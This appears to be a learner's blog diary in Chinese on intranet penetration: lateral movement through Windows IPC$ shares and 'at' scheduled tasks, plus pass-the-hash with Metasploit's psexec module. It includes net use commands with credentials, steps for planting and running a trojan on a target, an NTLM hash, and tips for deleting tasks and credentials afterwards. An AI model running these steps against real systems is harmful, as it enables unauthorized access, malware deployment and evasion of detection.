记录内网渗透学习进程--DAY16

IPC+计划任务进⾏横向移动
IPC
IPC$(Internet Process Connection)是“进程间通信”的简称,其本质是⼀个共享的“命名管道”资源,主要的作⽤是为了让进程间通信而开放⼀个命名管道,通过提供可信任的⽤⼾名和口令,从而到达连接双⽅可以建⽴⼀个安全的通 道并以此进⾏加密数据交换的功能,最终显现出来的效果就是能够实现对远程计算机的访问
基础利⽤条件 1.⽬标开启445端口。 2.已有⽬标凭证

IPC + at
IPC+at on windows 2003\xp
使⽤条件:启动Task Scheduler服务   net use \\10.10.10.4\C$ "877133"/u:"workgroup\Administrator"    # $C表示连接C盘 #IPC表示连接所有盘
记录内网渗透学习进程--DAY16

 

net use 查看所有的连接

记录内网渗透学习进程--DAY16

net use #查看所有ipc连接 net use \\<target-ip>\C$/del#删除指定ipc连接 net use * /del /y#删除所有ipc连接

 

 

 

 

上传木马到跳板机

 

记录内网渗透学习进程--DAY16

 

 

 

复制到目标机

记录内网渗透学习进程--DAY16

 

 

以定时任务的方式去执行文件

记录内网渗透学习进程--DAY16

 

at \\<target-ip> 1 /delete #删除at计划任务1,运⾏完成后⼀定要删除计划任务!

 

 

成功上线

记录内网渗透学习进程--DAY16

 

 TIPS:同一session的不同权限之间能看到的连接都不同, 不同session之间也不同,必须是相同session和相同权限才能看到相同的连接

 

 

当我们没有明文密码时只有哈希值时,可以用msf_psexec模块登陆

use exploit/windows/smb/psexec
set rhosts 192.168.15.181
set smbuser rabbitmask
set smbpass aad3b435b51404eeaad3b435b51404ee:0515322a55615056aaabb044a48463a4




也可以使用pth命令用哈希值来登陆,系统会自动寻找网段里能符合要求的计算机
记录内网渗透学习进程--DAY16

 

 

依然可以连接上

记录内网渗透学习进程--DAY16

 

结束后要记录内网渗透学习进程--DAY16来清除自身的凭证,否则可以用记录内网渗透学习进程--DAY16看到记录的账号密码

 

 

 

 

 

 

 

 

 

 

 

 

 

 
上一篇:day16-封装


下一篇:day16-面向对象作业